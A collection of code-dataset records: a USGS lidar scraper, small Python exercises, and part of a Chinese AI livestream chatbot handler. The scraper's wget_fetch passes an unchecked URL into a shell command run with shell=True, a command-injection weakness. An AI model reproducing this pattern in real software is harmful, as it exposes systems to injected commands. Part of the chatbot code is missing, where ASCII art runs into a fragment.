so be careful!\n #actually it is always a bit weird: The gps_time is seconds since January 6th 1980 minus 1 billion. So to get a unix timestamp we do the following:\n unix_time = point.gps_time[0]+1000000000+315964782\n\n if data['date_range'][0] == None:\n data['date_range'][0] = unix_time\n if data['date_range'][1] == None:\n data['date_range'][1] = unix_time\n\n data['date_range'][0] = min(data['date_range'][0], unix_time)\n data['date_range'][1] = max(data['date_range'][1], unix_time)\n\n i = i - 1\n if point_limit > 0 and i <= 0:\n break\n\n #now turn the unix timstamp to a local timestamp:\n data['date_range_local'] = [datetime.fromtimestamp(data['date_range'][0]), datetime.fromtimestamp(data['date_range'][1])]\n\n return data\n\ndef laz_meta_extract_data(project_id, subproject_id, filename):\n meta_filename = filename.replace('.laz', '.xml')\n laz_filename = filename.replace('.xml', '.laz')\n laz_data = laz_extract_data(project_id, subproject_id, laz_filename)\n meta_data = metadata_extract_data(project_id, subproject_id, meta_filename)\n\n converted = projection_convert(laz_data['bbox'][0], meta_data[2], 'point')\n print (laz_data)\n print(laz_data['bbox'][0], meta_data[2], converted)\n\ndef test_fetch(url, download_filepath):\n return wget_fetch(url, download_filepath, 2)\n\ndef wget_fetch(url, download_filepath, retries=9):\n i = retries\n wget_process_out = None\n while i > 0:\n cmd = \"wget -S --quiet -t 1 -O %s %s \" % (download_filepath, url)\n wget_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n wget_process_out = str(wget_process.communicate()[0], 'utf-8')\n\n if wget_process_out != None and wget_process_out != '':\n break\n i = i - 1\n\n return check_wget_response_and_download(wget_process_out, download_filepath)\n\ndef check_wget_response_and_download(response, download_filepath):\n if response == None or response == '':\n return 'no response'\n\n if not os.path.isfile(download_filepath):\n return ''\n\n file = open(download_filepath, 'r')\n file_contents = file.read()\n if len(file_contents) == 0:\n os.remove(download_filepath)\n return 'not downloaded'\n\n response_lines = response.split(\"\\n\")\n if not ' 200 ' in response_lines[0]:\n os.remove(download_filepath)\n return response_lines[0]\n\n return True\n\ndef cleanup_download(filepath):\n if os.path.isfile(filepath):\n os.remove(filepath)\n\n# check if there is META Data\n# if META DATA is a list of XML files, download them, find bouning box\n# if META DATA is a ZIP 
file of SHP fileset, try to download and convert with geopandas to a bounding box\n# if META DATA ZIP is corrupted or missing, use the wXXXX nYYYY local projection in filename and convert to a bounding box if we can figure out the projection\n# if no metadata possible, count the number of LAZ files and if NOT too big, download them all and grab date/bounding box from there\n# if DATA is older than 2014, mark it as old, check FILE NAME of project name/dataset for year\n\n\n# RESULT\n# TODO: an easy to way to monitor a scraping process (simple webpage that polls the scraped files/data)\n# - a list of USGS projects/datasets to scrape (with status next to each)\n# - button to kick off a scrape or re-scrape\n# - checks/status on\n# - scrape process is running normally, scrape process did not exist abnormally\n# - meta index was fetch (or failed to fetch): 2053 meta files total\n# - 2040 meta files fetched, 13 failed to fetch\n# - 2020 meta files contain proper bounding box/dates, 20 contain invalid bounding box/dates (manually investigate)\n# - 1240 meta files intersect with RICHMOND, CA,\n# - 1233 LAZ files fetch, 7 failed to fetch\n# - 1233 LAZ files dates parsed\n# - date ranges from LAZ: 1/2/2020-1/19/2020\n# - date ranges from Meta: 1/1/2020-1/20/2020\n\n# TODO: tie to the satellite imagery\n\n# TODO: compare the rngdates from XML meta file to point reading from LAZ file in first 2-3 sets to establish if meta data is enough\n# city polygon\n# array of lidar scan polygons with dates attached to each: rows of the format: ,,,\n# a global date range for entire city lidar points\n# ==> ideally we can put this on a Mapbox UI\n\ndef run(cmd, args):\n out = '''select a Command:\n projects_get\n downloads_dir_get\n downloads_dir_list\n project_get\n metadata_files_fetch\n metadata_file_fetch\n metadata_extract_data\n city_polygon_get\n polygon_multipolygon_overlap_check\n find_overlapping_lidar_scans\n laz_file_fetch\n laz_extract_data\n laz_and_meta_extract_data\n --- test: ----\n test_fetch\n '''\n if cmd == 'downloads_dir_get':\n out = downloads_dir_get(args.project_id)\n elif cmd == 'project_get':\n out = project_get(args.project_id+('/'+args.subproject_id if args.subproject_id else ''), args.options=='json_only')\n elif cmd == 'project_scrape':\n out = project_scrape(args.project_id+('/'+args.subproject_id if args.subproject_id else ''), args.options=='json_only')\n elif cmd == 'metadata_files_fetch':\n out = metadata_files_fetch(args.project_id+('/'+args.subproject_id if args.subproject_id else ''), -1)\n elif cmd == 'project_metadata_count':\n out = project_metadata_count(args.project_id+('/'+args.subproject_id if args.subproject_id else ''))\n elif cmd == 'metadata_file_fetch':\n out = metadata_file_fetch(args.project_id, args.subproject_id, args.file)\n elif cmd == 'downloads_dir_list':\n out = os.listdir(downloads_dir_get(args.project_id))\n elif cmd == 'metadata_extract_data':\n out = metadata_extract_data(args.project_id, args.subproject_id, args.file)\n elif cmd == 'city_polygon_get':\n out = city_polygon_get(args.city_id)\n elif cmd == 'polygon_multipolygon_overlap_check':\n out = polygon_multipolygon_overlap_check(\n metadata_extract_data(args.project_id, args.subproject_id, args.file)[0],\n city_polygon_get(args.city_id))\n elif cmd == 'find_overlapping_lidar_scans':\n out = find_overlapping_lidar_scans(\n args.project_id, args.subproject_id, args.city_id)\n elif cmd == 'laz_file_fetch':\n out = laz_file_fetch(args.project_id, args.subproject_id, args.file)\n elif cmd == 
'laz_extract_data':\n out = laz_extract_data(args.project_id, args.subproject_id, args.file)\n elif cmd == 'laz_and_meta_extract_data':\n out = laz_meta_extract_data(args.project_id, args.subproject_id, args.file)\n elif cmd == 'projects_get':\n out = projects_get(args.options == 'json_only')\n elif cmd == 'projects_scrape':\n out = projects_scrape(args.options == 'json_only')\n elif cmd == 'test_fetch':\n out = test_fetch(args.test_url, args.test_download_file)\n\n print(out)\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--cmd', dest='cmd', type=str, help='Specify command')\nparser.add_argument('--project_id', dest='project_id', type=str, help='Specify project ID')\nparser.add_argument('--subproject_id', dest='subproject_id', type=str, help='Specify sub-project ID')\nparser.add_argument('--file', dest='file', type=str, help='Specify file')\nparser.add_argument('--options', dest='options', type=str, help='Specify options')\nparser.add_argument('--test-url', dest='test_url', type=str, help='Specify TEST URL')\nparser.add_argument('--test-download-file', dest='test_download_file', type=str, help='Specify TEST download file')\nargs = parser.parse_args()\n\nsample_project_id = 'CA_NoCAL_3DEP_Supp_Funding_2018_D18'\nsample_subproject_id = 'CA_NoCAL_Wildfires_B5b_2018'\nsample_meta_index = 'meta_index_23_03_01_12_29_46__6407.html'\nsample_meta = 'USGS_LPC_CA_NoCAL_3DEP_Supp_Funding_2018_D18_w2215n1973.xml'\nsample_laz = 'USGS_LPC_CA_NoCAL_3DEP_Supp_Funding_2018_D18_w2215n1973.laz'\nsample_city_id = 'richmond-ca'\nsample_lidar_polygon = [\n (-122.3583707, 37.9432179),\n (-122.3583707, 37.9422179),\n (-122.3573707, 37.9422179),\n (-122.3573707, 37.9432179)]\n\nif (__name__ == '__main__'):\n run(args.cmd, args)","repo_name":"hyphae-lab/lai-algorithm-training-scraper","sub_path":"usgs-scraper/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":31110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6020748397","text":"print('\\033[1;34m=-=-=-=- GERADOR DE PA -=-=-=-=\\033[m')\nnum = int(input('Qual PRIMEIRO TERMO?'))\nrazao = int(input('Qual a razão?'))\ntermo = num\ncont = 1\na = 10\nwhile cont <=10:\n print('\\033[1;32m {} \\033[m'.format(termo),end='')\n print('>>' if cont < 10 else 'PAUSA',end='')\n termo += razao\n cont +=1\n # DAQUI PRA BAIXO 62!\n if cont == 11:\n d = int(input('\\n Quantos termos mais quer mostrar?'))\n cont -= d\n a += d\n if d == 0:\n print('\\033[1;34mProgressão finalizada com\\033[m \\033[1;31m{} \\033[1;34mtermos!\\033[m'.format(a))","repo_name":"19AllefKeynner/exercicios-python","sub_path":"ex061.py","file_name":"ex061.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"35117561183","text":"memo = {0: 0, 1: 1}\n\n\ndef fibonacci(n):\n global cnt_0, cnt_1\n if n == 0:\n cnt_0 += 1\n return 0\n elif n == 1:\n cnt_1 += 1\n return 1\n elif n in memo:\n return memo[n]\n else:\n memo[n] = fibonacci(n - 1) + fibonacci(n - 2)\n return memo[n]\n\n\nT = int(input())\nfor t in range(T):\n cnt_0 = 0\n cnt_1 = 0\n N = int(input())\n fibonacci(N)\n print(cnt_0, cnt_1)\n # fibonacci(40)\n # if N == 0:\n # print(\"1 0\")\n # elif N == 1:\n # print(\"0 1\")\n # elif N == 2:\n # print(\"1 1\")\n # else:\n # print(memo[N - 1], memo[N])\n\n","repo_name":"Gyusik-Choi/algorithm","sub_path":"baekjoon/1003_피보나치 
함수/B_1003.py","file_name":"B_1003.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2616279017","text":"class Solution:\n def nearestValidPoint(self, x: int, y: int, points: list[list[int]]) -> int:\n\n bestIndex = -1\n shortest_distance = 0\n\n for index in range(len(points)):\n point = points[index]\n if (x == point[0] or y == point[1]):\n man_distance = abs(x-point[0]) + abs(y-point[1])\n if (man_distance < shortest_distance or bestIndex == -1):\n bestIndex = index\n shortest_distance = man_distance\n\n return bestIndex\n","repo_name":"semere01/Comptetitive-Programming","sub_path":"a2sv-group-43/python-sheet/find-nearest-point-that-has-the-same-x-or-y-coordinate.py","file_name":"find-nearest-point-that-has-the-same-x-or-y-coordinate.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23711616785","text":"import os, threading, json, random\nimport difflib\nimport logging\nfrom datetime import datetime\nimport traceback\nimport importlib\nimport pyautogui\n\nfrom .config import Config\nfrom .common import Common\nfrom .audio import Audio\nfrom .gpt_model.gpt import GPT_MODEL\nfrom .logger import Configure_logger\nfrom .db import SQLiteDB\n\n\n\"\"\"\n\t___ _ \n\t|_ _| | ____ _ _ __ ___ ___ \n\t | || |/ / _` | '__/ _ \\/ __|\n\t | || < (_| | | | (_) \\__ \\\n\t|___|_|\\_\\__,_|_| \\___/|___/\n\n\"\"\"\n\n\nclass My_handle():\n common = None\n config = None\n audio = None\n\n def __init__(self, config_path):\n logging.info(\"初始化My_handle...\")\n\n if My_handle.common is None:\n My_handle.common = Common()\n if My_handle.config is None:\n My_handle.config = Config(config_path)\n if My_handle.audio is None:\n My_handle.audio = Audio(config_path)\n\n # 日志文件路径\n file_path = \"./Log/Log-\" + My_handle.common.get_bj_time(1) + \".txt\"\n Configure_logger(file_path)\n\n self.proxy = None\n # self.proxy = {\n # \"http\": \"http://127.0.0.1:10809\",\n # \"https\": \"http://127.0.0.1:10809\"\n # }\n\n try:\n # 数据丢弃部分相关的实现\n self.data_lock = threading.Lock()\n self.timers = {}\n\n # 设置会话初始值\n self.session_config = {'msg': [{\"role\": \"system\", \"content\": My_handle.config.get('chatgpt', 'preset')}]}\n self.sessions = {}\n self.current_key_index = 0\n\n # 直播间号\n self.room_id = My_handle.config.get(\"room_display_id\")\n\n self.before_prompt = My_handle.config.get(\"before_prompt\")\n self.after_prompt = My_handle.config.get(\"after_prompt\")\n\n # 过滤配置\n self.filter_config = My_handle.config.get(\"filter\")\n # 答谢\n self.thanks_config = My_handle.config.get(\"thanks\")\n\n self.chat_type = My_handle.config.get(\"chat_type\")\n\n self.need_lang = My_handle.config.get(\"need_lang\")\n\n # 优先本地问答\n self.local_qa = My_handle.config.get(\"local_qa\")\n self.local_qa_audio_list = None\n \n # 音频合成使用技术\n My_handle.audio_synthesis_type = My_handle.config.get(\"audio_synthesis_type\")\n\n # Stable Diffusion\n self.sd_config = My_handle.config.get(\"sd\")\n\n # 点歌模块\n self.choose_song_config = My_handle.config.get(\"choose_song\")\n self.choose_song_song_lists = None\n\n logging.info(f\"配置数据加载成功。\")\n except Exception as e:\n logging.error(traceback.format_exc())\n\n # 设置GPT_Model全局模型列表\n GPT_MODEL.set_model_config(\"openai\", My_handle.config.get(\"openai\"))\n GPT_MODEL.set_model_config(\"chatgpt\", My_handle.config.get(\"chatgpt\"))\n GPT_MODEL.set_model_config(\"claude\", 
My_handle.config.get(\"claude\")) \n\n \"\"\"\n 新增LLM后,这边先定义下各个变量,下面会用到\n \"\"\"\n self.chatgpt = None\n self.claude = None\n self.claude2 = None\n self.chatglm = None\n self.chat_with_file = None\n self.text_generation_webui = None\n self.sparkdesk = None\n self.langchain_chatglm = None\n self.zhipu = None\n self.bard_api = None\n self.yiyan = None\n self.tongyi = None\n\n\n # 聊天相关类实例化\n if self.chat_type == \"chatgpt\":\n self.chatgpt = GPT_MODEL.get(\"chatgpt\")\n\n elif self.chat_type == \"claude\":\n self.claude = GPT_MODEL.get(self.chat_type)\n\n # 初次运行 先重置下会话\n if not self.claude.reset_claude():\n logging.error(\"重置Claude会话失败喵~\")\n elif self.chat_type == \"claude2\":\n GPT_MODEL.set_model_config(\"claude2\", My_handle.config.get(\"claude2\"))\n\n self.claude2 = GPT_MODEL.get(self.chat_type)\n\n # 初次运行 先重置下会话\n if self.claude2.get_organization_id() is None:\n logging.error(\"重置Claude2会话失败喵~\")\n elif self.chat_type == \"chatterbot\":\n from chatterbot import ChatBot # 导入聊天机器人库\n\n self.chatterbot_config = My_handle.config.get(\"chatterbot\")\n\n try:\n self.bot = ChatBot(\n self.chatterbot_config[\"name\"], # 聊天机器人名字\n database_uri='sqlite:///' + self.chatterbot_config[\"db_path\"] # 数据库URI,数据库用于存储对话历史\n )\n except Exception as e:\n logging.info(e)\n exit(0)\n elif self.chat_type == \"chatglm\":\n GPT_MODEL.set_model_config(\"chatglm\", My_handle.config.get(\"chatglm\"))\n\n self.chatglm = GPT_MODEL.get(self.chat_type)\n elif self.chat_type == \"chat_with_file\":\n from Tools.chat_with_file.chat_with_file import Chat_with_file\n self.chat_with_file = Chat_with_file(My_handle.config.get(\"chat_with_file\"))\n elif self.chat_type == \"text_generation_webui\":\n GPT_MODEL.set_model_config(\"text_generation_webui\", My_handle.config.get(\"text_generation_webui\"))\n\n self.text_generation_webui = GPT_MODEL.get(self.chat_type) \n elif self.chat_type == \"sparkdesk\":\n GPT_MODEL.set_model_config(\"sparkdesk\", My_handle.config.get(\"sparkdesk\"))\n\n self.sparkdesk = GPT_MODEL.get(self.chat_type)\n elif self.chat_type == \"langchain_chatglm\":\n GPT_MODEL.set_model_config(\"langchain_chatglm\", My_handle.config.get(\"langchain_chatglm\"))\n\n self.langchain_chatglm = GPT_MODEL.get(self.chat_type)\n elif self.chat_type == \"zhipu\":\n GPT_MODEL.set_model_config(\"zhipu\", My_handle.config.get(\"zhipu\"))\n\n self.zhipu = GPT_MODEL.get(self.chat_type)\n elif self.chat_type == \"bard\":\n GPT_MODEL.set_model_config(\"bard\", My_handle.config.get(\"bard\"))\n\n self.bard_api = GPT_MODEL.get(self.chat_type)\n elif self.chat_type == \"yiyan\":\n GPT_MODEL.set_model_config(\"yiyan\", My_handle.config.get(\"yiyan\"))\n\n self.yiyan = GPT_MODEL.get(self.chat_type)\n elif self.chat_type == \"tongyi\":\n GPT_MODEL.set_model_config(\"tongyi\", My_handle.config.get(\"tongyi\"))\n\n self.tongyi = GPT_MODEL.get(self.chat_type)\n elif self.chat_type == \"game\":\n self.game = importlib.import_module(\"game.\" + My_handle.config.get(\"game\", \"module_name\"))\n\n # exit(0)\n\n # 判断是否使能了SD\n if self.sd_config[\"enable\"]:\n from Tools.sd import SD\n\n self.sd = SD(self.sd_config)\n\n # 判断是否使能了点歌模式\n if self.choose_song_config[\"enable\"]:\n # 获取本地音频文件夹内所有的音频文件名\n self.choose_song_song_lists = My_handle.audio.get_dir_audios_filename(self.choose_song_config[\"song_path\"])\n\n # 日志文件路径\n self.log_file_path = \"./Log/Log-\" + My_handle.common.get_bj_time(1) + \".txt\"\n if os.path.isfile(self.log_file_path):\n logging.info(f'{self.log_file_path} 日志文件已存在,跳过')\n else:\n with open(self.log_file_path, 'w') as 
f:\n f.write('')\n logging.info(f'{self.log_file_path} 日志文件已创建')\n\n self.comment_file_path = \"./Log/comment-\" + My_handle.common.get_bj_time(1) + \".txt\"\n if os.path.isfile(self.comment_file_path):\n logging.info(f'{self.comment_file_path} 弹幕文件已存在,跳过')\n else:\n with open(self.comment_file_path, 'w') as f:\n f.write('')\n logging.info(f'{self.comment_file_path} 弹幕文件已创建')\n\n \"\"\" \n \n ............. '>)xcn)I \n }}}}}}}}}}}}](v0kaaakad\\.. \n ++++++~~++<_xpahhhZ0phah> \n _________+(OhhkamuCbkkkh+ \n ?????????nbhkhkn|makkkhQ^ \n [[[[[[[}UhkbhZ]fbhkkkhb< \n 1{1{1{1ChkkaXicohkkkhk] \n ))))))JhkkhrICakkkkap- \n \\\\\\\\|ckkkat;0akkkka0> \n ttt/fpkka/;Oakhhaku\" \n jjjjUmkau^QabwQX\\< '!<++~>iI .;>++++<>I' :+}}{?; \n xxxcpdkO\"capmmZ/^ +Y-;,,;-Lf ItX/+l:\",;>1cx> .`\"x#d>` .`. \n uuvqwkh+1ahaaL_ 'Zq; ;~ '/bQ! \"uhc: . 1oZ' \"vj. ^' \n ccc0kaz!kawX}' .\\hbv?: .jop; .C*L^ )oO` .':I^. .\"_L!^^. ':;,' \n XXXXph_cU_\" >rZhbC\\! \"qaC... faa~ )oO` ;-jqj .l[mb1]_' ^(|}\\Ow{ \n XXXz00i+ '!1Ukkc, 'JoZ` . uop; )oO' >ou .Lp\" . ,0j^^>Yvi \n XXXzLn. . ^> lC#( lLot. _kq- . 1o0' >on .Qp, }*|>}}}/rrx1]~^ ^?jvv/]--]{r) .i{x/+; ]Xr1_;. :(vnrj\\i. \n '1.. .''. . .Itq*Z}` .. \n +; . \"}XmQf-i!;. \n . ';>= min_similarity]\n \n # 如果没有符合条件的回答,返回None\n if not similarity_responses:\n return None\n \n # 按相似度降序排序\n similarity_responses.sort(reverse=True, key=lambda x: x[0])\n \n # 获取相似度最高的回答列表\n top_response = similarity_responses[0][1]\n \n # 随机选择一个回答\n response = random.choice(top_response)\n \n return response\n\n\n # 本地问答库 处理\n def local_qa_handle(self, data):\n \"\"\"本地问答库 处理\n\n Args:\n data (dict): 用户名 弹幕数据\n\n Returns:\n bool: 是否触发并处理\n \"\"\"\n user_name = data[\"username\"]\n content = data[\"content\"]\n\n # 合并字符串末尾连续的* 主要针对获取不到用户名的情况\n user_name = My_handle.common.merge_consecutive_asterisks(user_name)\n\n # 1、匹配本地问答库 触发后不执行后面的其他功能\n if self.local_qa[\"text\"][\"enable\"] == True:\n # 根据类型,执行不同的问答匹配算法\n if self.local_qa[\"text\"][\"type\"] == \"text\":\n tmp = self.find_answer(content, self.local_qa[\"text\"][\"file_path\"], self.local_qa[\"text\"][\"similarity\"])\n else:\n tmp = self.find_similar_answer(content, self.local_qa[\"text\"][\"file_path\"], self.local_qa[\"text\"][\"similarity\"])\n\n if tmp != None:\n logging.info(f\"触发本地问答库-文本 [{user_name}]: {content}\")\n # 将问答库中设定的参数替换为指定内容,开发者可以自定义替换内容\n if \"{cur_time}\" in tmp:\n tmp = tmp.format(cur_time=My_handle.common.get_bj_time(5))\n if \"{username}\" in tmp:\n tmp = tmp.format(username=user_name)\n else:\n tmp = tmp\n \n logging.info(f\"本地问答库-文本回答为: {tmp}\")\n\n resp_content = tmp\n # 将 AI 回复记录到日志文件中\n with open(self.comment_file_path, \"r+\", encoding=\"utf-8\") as f:\n tmp_content = f.read()\n # 将指针移到文件头部位置(此目的是为了让直播中读取日志文件时,可以一直让最新内容显示在顶部)\n f.seek(0, 0)\n # 不过这个实现方式,感觉有点低效\n # 设置单行最大字符数,主要目的用于接入直播弹幕显示时,弹幕过长导致的显示溢出问题\n max_length = 20\n resp_content_substrings = [resp_content[i:i + max_length] for i in\n range(0, len(resp_content), max_length)]\n resp_content_joined = '\\n'.join(resp_content_substrings)\n\n # 根据 弹幕日志类型进行各类日志写入\n if My_handle.config.get(\"comment_log_type\") == \"问答\":\n f.write(f\"[{user_name} 提问]:{content}\\n[AI回复{user_name}]:{resp_content_joined}\\n\" + tmp_content)\n elif My_handle.config.get(\"comment_log_type\") == \"问题\":\n f.write(f\"[{user_name} 提问]:{content}\\n\" + tmp_content)\n elif My_handle.config.get(\"comment_log_type\") == \"回答\":\n f.write(f\"[AI回复{user_name}]:{resp_content_joined}\\n\" + tmp_content)\n\n message = {\n \"type\": \"comment\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": 
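# the data field carries the whole config section for the active TTS engine\n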
My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n return True\n\n # 2、匹配本地问答音频库 触发后不执行后面的其他功能\n if self.local_qa[\"audio\"][\"enable\"] == True:\n # 输出当前用户发送的弹幕消息\n # logging.info(f\"[{user_name}]: {content}\")\n # 获取本地问答音频库文件夹内所有的音频文件名\n local_qa_audio_filename_list = My_handle.audio.get_dir_audios_filename(self.local_qa[\"audio\"][\"file_path\"], type=1)\n self.local_qa_audio_list = My_handle.audio.get_dir_audios_filename(self.local_qa[\"audio\"][\"file_path\"], type=0)\n\n # 不含拓展名做查找\n local_qv_audio_filename = My_handle.common.find_best_match(content, local_qa_audio_filename_list, self.local_qa[\"audio\"][\"similarity\"])\n \n # print(f\"local_qv_audio_filename={local_qv_audio_filename}\")\n\n # 找到了匹配的结果\n if local_qv_audio_filename is not None:\n logging.info(f\"触发本地问答库-语音 [{user_name}]: {content}\")\n # 把结果从原文件名列表中在查找一遍,补上拓展名\n local_qv_audio_filename = My_handle.common.find_best_match(local_qv_audio_filename, self.local_qa_audio_list, 0)\n\n # 寻找对应的文件\n resp_content = My_handle.audio.search_files(self.local_qa[\"audio\"][\"file_path\"], local_qv_audio_filename)\n if resp_content != []:\n logging.debug(f\"匹配到的音频原相对路径:{resp_content[0]}\")\n\n # 拼接音频文件路径\n resp_content = f'{self.local_qa[\"audio\"][\"file_path\"]}/{resp_content[0]}'\n logging.info(f\"匹配到的音频路径:{resp_content}\")\n message = {\n \"type\": \"local_qa_audio\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n return True\n \n return False\n\n\n # 点歌模式 处理\n def choose_song_handle(self, data):\n \"\"\"点歌模式 处理\n\n Args:\n data (dict): 用户名 弹幕数据\n\n Returns:\n bool: 是否触发并处理\n \"\"\"\n user_name = data[\"username\"]\n content = data[\"content\"]\n\n # 合并字符串末尾连续的* 主要针对获取不到用户名的情况\n user_name = My_handle.common.merge_consecutive_asterisks(user_name)\n\n if self.choose_song_config[\"enable\"] == True:\n # 判断点歌命令是否正确\n if content.startswith(self.choose_song_config[\"start_cmd\"]):\n logging.info(f\"[{user_name}]: {content}\")\n\n # 去除命令前缀\n content = content[len(self.choose_song_config[\"start_cmd\"]):]\n # 判断是否有此歌曲\n song_filename = My_handle.common.find_best_match(content, self.choose_song_song_lists)\n if song_filename is None:\n # resp_content = f\"抱歉,我还没学会唱{content}\"\n # 根据配置的 匹配失败回复文案来进行合成\n resp_content = self.choose_song_config[\"match_fail_copy\"].format(content=content)\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n\n message = {\n \"type\": \"comment\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n return True\n \n resp_content = My_handle.audio.search_files(self.choose_song_config['song_path'], song_filename)\n if resp_content == []:\n return True\n \n logging.debug(f\"匹配到的音频原相对路径:{resp_content[0]}\")\n\n # 拼接音频文件路径\n resp_content = f\"{self.choose_song_config['song_path']}/{resp_content[0]}\"\n logging.info(f\"匹配到的音频路径:{resp_content}\")\n message = {\n \"type\": \"song\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": 
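# for the song type, content is the matched song's local audio path rather than text to synthesize\n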
My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n return True\n # 判断取消点歌命令是否正确\n elif content.startswith(self.choose_song_config[\"stop_cmd\"]):\n My_handle.audio.stop_current_audio()\n\n return True\n # 判断随机点歌命令是否正确\n elif content == self.choose_song_config[\"random_cmd\"]:\n resp_content = My_handle.common.random_search_a_audio_file(self.choose_song_config['song_path'])\n if resp_content is None:\n return True\n \n logging.info(f\"随机到的音频路径:{resp_content}\")\n\n message = {\n \"type\": \"song\",\n \"tts_type\": My_handle.audio_synthesis_type,\n \"data\": My_handle.config.get(My_handle.audio_synthesis_type),\n \"config\": self.filter_config,\n \"user_name\": user_name,\n \"content\": resp_content\n }\n\n # 音频合成(edge-tts / vits_fast)并播放\n My_handle.audio.audio_synthesis(message)\n\n return True\n\n\n return False\n\n\n # 画图模式 SD 处理\n def sd_handle(self, data):\n \"\"\"画图模式 SD 处理\n\n Args:\n data (dict): 用户名 弹幕数据\n\n Returns:\n bool: 是否触发并处理\n \"\"\"\n user_name = data[\"username\"]\n content = data[\"content\"]\n\n # 合并字符串末尾连续的* 主要针对获取不到用户名的情况\n user_name = My_handle.common.merge_consecutive_asterisks(user_name)\n\n if content.startswith(self.sd_config[\"trigger\"]):\n # 含有违禁词/链接\n if My_handle.common.profanity_content(content) or My_handle.common.check_sensitive_words2(\n self.filter_config[\"badwords_path\"], content) or \\\n My_handle.common.is_url_check(content):\n logging.warning(f\"违禁词/链接:{content}\")\n return\n \n if self.sd_config[\"enable\"] == False:\n logging.info(\"您还未启用SD模式,无法使用画画功能\")\n return True\n else:\n # 输出当前用户发送的弹幕消息\n logging.info(f\"[{user_name}]: {content}\")\n\n content = content[len(self.sd_config[\"trigger\"]):]\n\n # 根据设定的LLM\n if self.sd_config[\"prompt_llm\"][\"type\"] == \"chatgpt\":\n if self.chatgpt is None:\n self.chatgpt = GPT_MODEL.get(\"chatgpt\")\n\n content = self.sd_config[\"prompt_llm\"][\"before_prompt\"] + \\\n content + self.after_prompt\n # 调用gpt接口,获取返回内容\n resp_content = self.chatgpt.get_gpt_resp(user_name, content)\n if resp_content is not None:\n # 输出 ChatGPT 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:chatgpt无返回\")\n elif self.sd_config[\"prompt_llm\"][\"type\"] == \"claude\":\n if self.claude is None:\n self.claude = GPT_MODEL.get(self.chat_type)\n\n # 初次运行 先重置下会话\n if not self.claude.reset_claude():\n logging.error(\"重置Claude会话失败喵~\")\n \n content = self.before_prompt + content + self.after_prompt\n resp_content = self.claude.get_claude_resp(content)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:claude无返回\")\n elif self.sd_config[\"prompt_llm\"][\"type\"] == \"claude2\":\n if self.claude2 is None:\n self.claude2 = GPT_MODEL.get(self.chat_type)\n\n # 初次运行 先重置下会话\n if self.claude2.get_organization_id() is None:\n logging.error(\"重置Claude2会话失败喵~\")\n \n content = self.before_prompt + content + self.after_prompt\n resp_content = self.claude2.get_claude2_resp(content)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:claude2无返回\")\n elif self.sd_config[\"prompt_llm\"][\"type\"] == \"chatglm\":\n if self.chatglm is None:\n self.chatglm = GPT_MODEL.get(self.chat_type)\n\n # 生成回复\n resp_content 
= self.chatglm.get_chatglm_resp(content)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:chatglm无返回\")\n elif self.sd_config[\"prompt_llm\"][\"type\"] == \"text_generation_webui\":\n if self.text_generation_webui is None:\n self.text_generation_webui = GPT_MODEL.get(self.chat_type)\n\n # 生成回复\n resp_content = self.text_generation_webui.get_text_generation_webui_resp(content)\n if resp_content is not None:\n # 输出 返回的回复消息\n logging.info(f\"[AI回复{user_name}]:{resp_content}\")\n else:\n resp_content = \"\"\n logging.warning(\"警告:text_generation_webui无返回\")\n elif self.sd_config[\"prompt_llm\"][\"type\"] == \"none\":\n resp_content = content\n else:\n resp_content = content\n\n self.sd.process_input(resp_content)\n return True\n \n return False\n\n\n # 弹幕格式检查和特殊字符替换\n def comment_check_and_replace(self, content):\n \"\"\"弹幕格式检查和特殊字符替换\n\n Args:\n content (str): 待处理的弹幕内容\n\n Returns:\n str: 处理完毕后的弹幕内容/None\n \"\"\"\n # 判断弹幕是否以xx起始,如果不是则返回\n if self.filter_config[\"before_must_str\"] and not any(\n content.startswith(prefix) for prefix in self.filter_config[\"before_must_str\"]):\n return None\n else:\n for prefix in self.filter_config[\"before_must_str\"]:\n if content.startswith(prefix):\n content = content[len(prefix):] # 删除匹配的开头\n break\n\n # 判断弹幕是否以xx结尾,如果不是则返回\n if self.filter_config[\"after_must_str\"] and not any(\n content.endswith(prefix) for prefix in 